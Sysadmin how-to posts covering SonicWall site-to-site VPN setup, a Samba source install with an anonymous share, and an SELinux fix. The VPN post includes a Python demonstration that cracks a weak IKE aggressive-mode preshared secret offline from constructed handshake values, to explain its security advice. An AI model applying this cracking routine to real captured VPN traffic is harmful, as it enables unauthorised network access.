Sonicwall Site-To-Site VPN Setup


Setting up a site-to-site VPN is pretty simple on a Sonicwall. Whether you have a dynamic IP connecting to a static IP, or two static IPs, it's quick to set up and you can have it running in no time. It's as reliable as your internet connection and allows quick failover to a backup IP address if one should go down. Here's a quick write-up that shows how to do it whether you have two static addresses or one static and one dynamic address. Two dynamic IPs would require Dynamic DNS or some other tool that automatically updates a DNS record with your current address, so the peer can be reached by a name that stays constant. For this write-up, I am connecting a TZ100 to an NSA240.

Quick note: for a dynamic-to-static site-to-site configuration, use 0.0.0.0 as the "IPSec Primary Gateway Name or Address" on the static side, since the dynamic address will change. With 0.0.0.0 the static side cannot initiate; the dynamic side has to bring the tunnel up, and the static side matches the incoming negotiation to the right policy by the peer's IKE ID rather than by its address. That is why the identifiers in step 3 and Aggressive Mode in step 5 matter for this case.

1. To start, on both Sonicwalls: log in, go to the VPN Settings page, and write down each unit's Unique Firewall Identifier. Let's call the units Sonicwall1 and Sonicwall2 to keep things simple. For this write-up I've used Unique IDs of 000000000001 and 000000000002, and WAN addresses of 1.1.1.1 for Sonicwall1 and 2.2.2.2 for Sonicwall2, so we know which one we're talking about (these are placeholders; substitute your own). We will need the IDs in a little bit. By default the identifier is the unit's serial number, which on Sonicwall hardware is also its MAC address. Changing it from the default makes it harder for a stranger to guess the ID that provokes a response from your gateway, but it is sent in the clear during Aggressive Mode, so do not treat it as a secret; the preshared secret is the secret.

2. Now on Sonicwall1: click VPN Settings again and click Add under VPN Policies.

3. Now we enter our information on the General tab.

a. For Authentication Method use "IKE using Preshared Secret". For the name put whatever you want; I used ConnectionToSonicwall2.

b. Set the IPSec Primary Gateway Name or Address to Sonicwall2's WAN address (2.2.2.2 here). If Sonicwall2 has a dynamic address instead of a static one, enter 0.0.0.0.

c. The IPSec Secondary Gateway is the backup route to Sonicwall2. This applies if Sonicwall2 has two WAN connections: if the primary goes down, the tunnel automatically switches to the secondary until the primary becomes available again.

d. Enter your shared secret and then confirm it. This should be long and random (letters, numbers and special characters), because in Aggressive Mode it can be attacked offline by anyone who captures the start of the negotiation. Note it down for now, since you will need it when configuring Sonicwall2, and get rid of the note afterwards.

e. For the Local IKE ID: in the dropdown select "Sonicwall Identifier" and enter the Unique Firewall ID of Sonicwall1 (the one you're currently on).

f. For the Peer IKE ID: in the dropdown select "Sonicwall Identifier" and enter the Unique Firewall ID of Sonicwall2.

4. On the Network tab

a. Under Local Networks, choose "Choose local network from list" and pick "LAN Subnets" if you want the remote site to reach everything on your LAN. If only part of the LAN needs to be reachable, create a narrower address object instead; the tunnel should carry only what the remote site actually needs.

b. Under Destination Networks, choose "Choose destination network from list" and add Sonicwall2's LAN (2.2.2.0 in this example) by clicking "Create New Address Object" and entering the appropriate info. The two LANs must not overlap, or the routes will collide.

5. On the Proposals tab, change the Exchange to "Aggressive Mode". This is needed when one end has a dynamic address (0.0.0.0 on the other side), because the policy has to be matched by IKE ID before the key exchange completes. If both ends are static, leave it at Main Mode, which is safer: in Aggressive Mode the responder sends the hash derived from the preshared secret unencrypted, so anyone who captures or provokes the first two messages can run an offline dictionary attack against the secret. I changed the encryption to AES-256; you can leave it at the default of 3DES, but 3DES is old and slow and AES is the better choice. Pick the largest DH group both units support. Everything else I left default.

6. On the Advanced tab I checked "Enable Keep Alive" and "Enable Windows Networking (NetBIOS) Broadcast" and left everything else default. Keep Alive brings the tunnel up and keeps it up without waiting for interesting traffic; the NetBIOS option is only needed if you rely on browse lists or name broadcasts across the tunnel, and can stay off if you use DNS. Click OK when you're done.

7. Now we go to Sonicwall2 and enter basically the same settings reversed. Log in to Sonicwall2, go to the VPN Settings page and click Add under VPN Policies.

8. Now we enter our information on the General tab.

a. For Authentication Method use "IKE using Preshared Secret". For the name put whatever you want; I used ConnectionToSonicwall1.

b. Set the IPSec Primary Gateway Name or Address to Sonicwall1's WAN address. If Sonicwall1 has a dynamic address instead of a static one, enter 0.0.0.0. My Sonicwall1 has the static address 1.1.1.1, so I enter that here.

c. The IPSec Secondary Gateway is the backup route to Sonicwall1, for when Sonicwall1 has two WAN connections: if the primary goes down, the tunnel switches to the secondary until the primary is back. So if Sonicwall1 had a failover address of 3.3.3.3, I would enter it here.

d. Enter the same shared secret you entered when configuring Sonicwall1.

e. For the Local IKE ID: in the dropdown select "Sonicwall Identifier" and enter the Unique Firewall ID of Sonicwall2 (the one you're currently on).

f. For the Peer IKE ID: in the dropdown select "Sonicwall Identifier" and enter the Unique Firewall ID of Sonicwall1 that you copied earlier.

9. On the Network tab

a. Under Local Networks, choose "Choose local network from list" and pick "LAN Subnets" if you want the remote site to reach everything on Sonicwall2's LAN, or a narrower address object if it only needs part of it.

b. Under Destination Networks, choose "Choose destination network from list" and add Sonicwall1's LAN, creating an address object for it with "Create New Address Object" if one does not exist yet. This is the mirror of what you entered on Sonicwall1: there the destination was Sonicwall2's LAN (2.2.2.0); here the destination is Sonicwall1's LAN and the local network is Sonicwall2's.

10. On the Proposals tab, set the Exchange to "Aggressive Mode" and the encryption to AES-256, exactly matching what you chose on Sonicwall1. Every Phase 1 and Phase 2 proposal setting (exchange mode, DH group, encryption, authentication hash) must agree at both ends or the IKE negotiation fails. Everything else I left default.

11. On the Advanced tab I checked "Enable Keep Alive" and "Enable Windows Networking (NetBIOS) Broadcast", matching Sonicwall1, and left everything else default. Click OK when you're done.

That should be it. To see if it connected, go back to the VPN Settings page: there will be a green light to the right of the gateway under VPN Policies. If it does not connect, go to the Logs menu and under the filter category select VPN IKE to show only the IKE negotiation messages. Both units log the reason they are not connecting, which can be cryptic, but there is plenty of information about the errors you may receive if you Google them. Before pulling your hair out, go back and double-check that your settings match at both ends: IP addresses, preshared secrets, Sonicwall Identifiers (the local ID on one side must equal the peer ID on the other), and everything on the Proposals tab. Also make sure that "Enable VPN" is checked on the VPN Settings page and that "Enable" is checked next to your VPN policy, or it will not try to connect.
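Why the "long and random" advice in step 3d matters once step 5 selects Aggressive Mode: the following is an added example, not code from the original post and not anything SonicWall ships. It builds a toy IKEv1 aggressive-mode exchange from constructed values (cookies, nonces, DH public values sized for group 2, a made-up SA payload, SHA-1 as the negotiated hash) using the RFC 2409 formulas, then runs the offline dictionary attack that an eavesdropper, or anyone who sends a first message with the right peer ID to the static gateway, can mount on the HASH_R the responder returns unencrypted. That a "Sonicwall Identifier" travels as an ID_KEY_ID payload is an assumption made for the example; the wordlist is constructed.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """RFC 2409 prf: HMAC keyed with `key` using the negotiated hash (SHA-1 here)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """RFC 2409 section 5.4, preshared-key authentication:
    SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return prf(psk, ni_b + nr_b)


def hash_r(psk: bytes, ex: Dict[str, bytes]) -> bytes:
    """RFC 2409 section 5:
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, ex["ni_b"], ex["nr_b"])
    return prf(skeyid, ex["g_xr"] + ex["g_xi"] + ex["cky_r"] + ex["cky_i"]
               + ex["sai_b"] + ex["idir_b"])


def id_payload_body(identifier: bytes) -> bytes:
    """Identification payload body without its generic header:
    ID type (1 byte), protocol (1), port (2), then the identifier data.
    Type 11 is ID_KEY_ID; carrying the Sonicwall Identifier this way is an
    assumption made for this example."""
    return bytes([11, 0, 0, 0]) + identifier


# Constructed aggressive-mode exchange (not a real capture). Every field here
# is sent unencrypted in messages 1 and 2, so a sniffer on the path learns all
# of them. Only the preshared secret stays off the wire.
EXCHANGE: Dict[str, bytes] = {
    "cky_i": bytes.fromhex("0123456789abcdef"),   # initiator cookie (ISAKMP header)
    "cky_r": bytes.fromhex("fedcba9876543210"),   # responder cookie
    "g_xi": b"\x11" * 128,                        # initiator DH public value, group 2 size
    "g_xr": b"\x22" * 128,                        # responder DH public value
    "ni_b": b"\x33" * 16,                         # initiator nonce body
    "nr_b": b"\x44" * 16,                         # responder nonce body
    "sai_b": bytes.fromhex("00000001000000010000002c010100010000002401010000800b0001"
                           "800c0e10800100078002000280040002800e0100"),  # SA body, constructed
    "idir_b": id_payload_body(b"000000000002"),   # responder's ID: Sonicwall2's identifier
}


def responder_message_2(psk: bytes, ex: Dict[str, bytes]) -> bytes:
    """The part of the responder's second message an attacker needs: HASH_R, in the clear."""
    return hash_r(psk, ex)


def crack_psk(observed_hash_r: bytes, ex: Dict[str, bytes],
              wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute HASH_R per candidate and compare.
    No further packets are sent, so rate limiting on the gateway cannot help."""
    for word in wordlist:
        if hash_r(word.encode(), ex) == observed_hash_r:
            return word
    return None


# Constructed wordlist standing in for a real dictionary.
WORDLIST = ["password", "sonicwall", "Sonicwall1", "vpn2011", "sonicwall123", "letmein"]


def demo_weak_psk() -> Optional[str]:
    """A guessable preshared secret falls to the offline attack."""
    captured = responder_message_2(b"sonicwall123", EXCHANGE)
    return crack_psk(captured, EXCHANGE, WORDLIST)


def demo_strong_psk() -> Optional[str]:
    """A long random secret, as step 3d recommends, is in no wordlist."""
    captured = responder_message_2(secrets.token_urlsafe(32).encode(), EXCHANGE)
    return crack_psk(captured, EXCHANGE, WORDLIST)


if __name__ == "__main__":
    print("weak PSK recovered:  ", demo_weak_psk())
    print("strong PSK recovered:", demo_strong_psk())
```

This is the same computation that tools such as ike-scan's psk-crack perform against real captures. In Main Mode the responder's hash is only sent inside the encrypted fifth and sixth messages, which is why Main Mode is preferred when both ends are static. When one end must use 0.0.0.0 and Aggressive Mode, the defence is a preshared secret long enough that no dictionary or brute-force run finishes, and one that is not reused anywhere else.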


Samba Install from Source and allow anonymous access from Windows


I needed an anonymous share set up for access by some Windows workstations on a secure network. The key to this is "security = share" in the [global] section of smb.conf, because "security = user" always prompted for a Windows password no matter what I did, even after adding the user with smbpasswd -a. Hopefully this will get you up and running with Samba in no time.

INSTALL FROM SOURCE
I installed Samba from source by doing the following. Two notes before you copy it: Samba publishes a detached GPG signature (.asc) for each release, so verify the tarball before building anything you will run as root, and the 3.x series this was written against is end-of-life; current Samba 4 releases build from a single top-level ./configure, so the cd source3 step does not apply there.

# wget http://www.samba.org/samba/ftp/samba-latest.tar.gz
# tar xvzf samba-latest.tar.gz
# cd samba-3.5.7       (or whatever version is the latest)
# cd source3
# ./configure --with-smbmount --with-ads --with-ldap

(If you get "configure: error: ldap.h is needed for LDAP support", you need the openldap-devel package for ldap.h: yum -y install openldap-devel.)

# make
# make install

This installs everything under /usr/local/samba by default: the daemons in sbin, smbclient, smbstatus and the other tools in bin, and it expects smb.conf in /usr/local/samba/lib.

To start Samba:
# /usr/local/samba/sbin/smbd -D
# /usr/local/samba/sbin/nmbd -D

To start it automatically at boot, edit /etc/rc.d/rc.local and add the following at the end. rc.local runs as root, which smbd needs in order to bind ports 139 and 445 and to switch to the connecting user's uid; a proper init script with start/stop/status is the better long-term option.
echo "Starting smbd..."
/usr/local/samba/sbin/smbd -D
echo "Starting nmbd..."
/usr/local/samba/sbin/nmbd -D

Here's a simple smb.conf I set up for sharing the /tmp directory. I grabbed part of it from an example in the untarred source directory created above. Run find /root -name 'smb.conf*' to find the example config files, copy one to /usr/local/samba/lib, and modify it to suit your needs.

[global]
    workgroup = SAMBA
    security = share
    ; 5 is a debugging level; it logs client names, paths and auth detail
    debug level = 5

[cd1]
    path = /mnt/cd1
    ; public is a synonym for guest ok
    public = yes

[cd2]
    path = /mnt/cd2
    public = yes

[media]
    path = /media
    public = yes

[tmp]
    path = /tmp
    guest only = yes
    public = yes
    ; read only = no makes this share writable by anonymous users
    read only = no

A good resource is here.

I also had a problem connecting to the share from Linux and Windows at first. This was because of SELinux: you need to allow smbd access if it is enabled. I have a write-up on this below, under "Samba SELinux NT_STATUS_BAD_NETWORK_NAME".

You should look into domain security, or at least something more secure than share security; for this write-up, if you need something quick and dirty, this will work. Two caveats. First, security = share was deprecated for years and was removed in Samba 4, so on any current release the equivalent of this setup is security = user together with map to guest = Bad User in [global] and guest ok = yes on the share. map to guest is what sends a failed or absent login to the guest account instead of back to the client for another password prompt, which is the behaviour described at the top of this post. Second, an anonymous writable share on /tmp lets anyone who can reach port 445 plant files where local users and services may read them; share a dedicated directory instead, and limit who can connect (hosts allow, or interfaces with bind interfaces only) to the workstation subnet.
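As an added example (not the post's own configuration or any Samba code), here is a small audit script for the kind of smb.conf shown above and for the points in the previous paragraph. Its parser is hand-written for smb.conf's INI-style syntax and the synonyms this page uses; the two extra configurations embedded in it are constructed: one reproduces the password-prompt symptom (security = user with a guest share but no map to guest), the other is the modern replacement for security = share.

```python
from typing import Dict, List

Share = Dict[str, str]

# The [global] and [tmp] sections from this post, used as sample input.
SMB_CONF_FROM_POST = """\
[global]
    workgroup = SAMBA
    security = share
    debug level = 5

[tmp]
    path = /tmp
    guest only = yes
    public = yes
    read only = no
"""

# Constructed: guest share under security = user without map to guest.
# Samba's default is map to guest = Never, so a Windows client whose
# credentials are unknown to the server is asked for a password again.
SMB_CONF_PROMPTS = """\
[global]
    security = user

[share]
    path = /srv/share
    guest ok = yes
"""

# Constructed: the modern equivalent of the post's setup.
SMB_CONF_MODERN = """\
[global]
    workgroup = SAMBA
    security = user
    map to guest = Bad User
    log level = 1

[tmp]
    path = /tmp
    guest ok = yes
    read only = no
"""


def parse_smb_conf(text: str) -> Dict[str, Share]:
    """Minimal smb.conf reader: sections, key = value, # and ; comments.
    Keys are lower-cased; a repeated key later in a section overrides the earlier one."""
    conf: Dict[str, Share] = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
            continue
        if section is not None and "=" in line:
            key, _, value = line.partition("=")
            conf[section][key.strip().lower()] = value.strip()
    return conf


def is_true(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1", "on")


def allows_guest(share: Share) -> bool:
    # "public" is a synonym for "guest ok"; "guest only" has no effect without it
    return any(is_true(share.get(k, "no")) for k in ("guest ok", "public"))


def is_writable(share: Share) -> bool:
    # Samba's default is read only = yes; "read only" is the inverse of "writable"
    if "read only" in share:
        return not is_true(share["read only"])
    return any(is_true(share.get(k, "no")) for k in ("writable", "writeable", "write ok"))


def audit(text: str) -> List[str]:
    """Return one finding per pitfall the post discusses."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    security = g.get("security", "user").lower()
    findings: List[str] = []

    if security == "share":
        findings.append("global: 'security = share' is deprecated and was removed in Samba 4; "
                        "use 'security = user' with 'map to guest = Bad User'")

    # "debug level" is the old name for "log level"; only the leading number matters
    level = (g.get("log level") or g.get("debug level") or "0").split()[0]
    if level.isdigit() and int(level) >= 3:
        findings.append(f"global: log level {level} records client names, paths and auth "
                        "detail; use 1 outside of debugging")

    guest_shares = [n for n, s in conf.items() if n != "global" and allows_guest(s)]
    if guest_shares and security == "user" and g.get("map to guest", "never").lower() == "never":
        findings.append("global: guest shares exist but 'map to guest' is Never (the default), "
                        "so clients are prompted for a password instead of getting guest access")

    for name in guest_shares:
        if is_writable(conf[name]):
            findings.append(f"[{name}]: anonymous users can write to {conf[name].get('path', '?')}")
    return findings


if __name__ == "__main__":
    for label, text in (("post", SMB_CONF_FROM_POST), ("prompts", SMB_CONF_PROMPTS),
                        ("modern", SMB_CONF_MODERN)):
        print(f"== {label} ==")
        for finding in audit(text):
            print(" -", finding)
```

Run it against your own file with audit(open("/usr/local/samba/lib/smb.conf").read()). The checks are deliberately narrow (the things this post touches); testparm remains the authority on whether Samba will accept the file at all.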

Another thing you may need to do is allow Samba through iptables if your firewall is blocking the NetBIOS ports 137-139 and the direct SMB port 445. Here are the entries in my iptables (/etc/sysconfig/iptables) that allow this; if the box has any interface outside the trusted network, add a -s restriction for the workstation subnet to each rule rather than opening these ports to the world.

-A INPUT -m state --state NEW -m udp -p udp --dport 137 -j ACCEPT
-A INPUT -m state --state NEW -m udp -p udp --dport 138 -j ACCEPT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 139 -j ACCEPT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 445 -j ACCEPT

Hope this helps someone out.

Samba SELinux NT_STATUS_BAD_NETWORK_NAME


When configuring a Samba server on a Linux box, any time I tried to connect with smbclient I would get the following error:

tree connect failed: NT_STATUS_BAD_NETWORK_NAME

Looking further at /var/log/messages revealed that this was being caused by SELinux:
setroubleshoot: SELinux is preventing /usr/sbin/smbd "name_connect" access on . For complete SELinux messages, run sealert -l 97453258-27dd-4980-a295-efb825ce95ca

To get around this I ran the following to configure SELinux to allow Samba access.

This lists the available Samba booleans:
# getsebool -a | grep samba
samba_create_home_dirs --> on
samba_domain_controller --> off
samba_enable_home_dirs --> off
samba_export_all_ro --> off
samba_export_all_rw --> off
samba_run_unconfined --> off
samba_share_fusefs --> off
samba_share_nfs --> off
use_samba_home_dirs --> off
virt_use_samba --> off

To turn one of these on or off, run a command like the following; the -P flag makes the change persistent across reboots (without it, the boolean reverts at the next boot):
# setsebool -P samba_export_all_rw on

The above command let me connect to the share and got rid of that error. Note that samba_export_all_rw lets smbd read and write files of every SELinux type on the system, which is a broad grant. For a share of a dedicated directory, the narrower fix is to label just that directory samba_share_t (persistently with semanage fcontext plus restorecon, or chcon for a one-off) and leave the export_all booleans off. For shares of system paths like /tmp and /media, which carry their own types, the boolean is the practical route; samba_export_all_ro is the less dangerous choice if the shares do not need to be writable.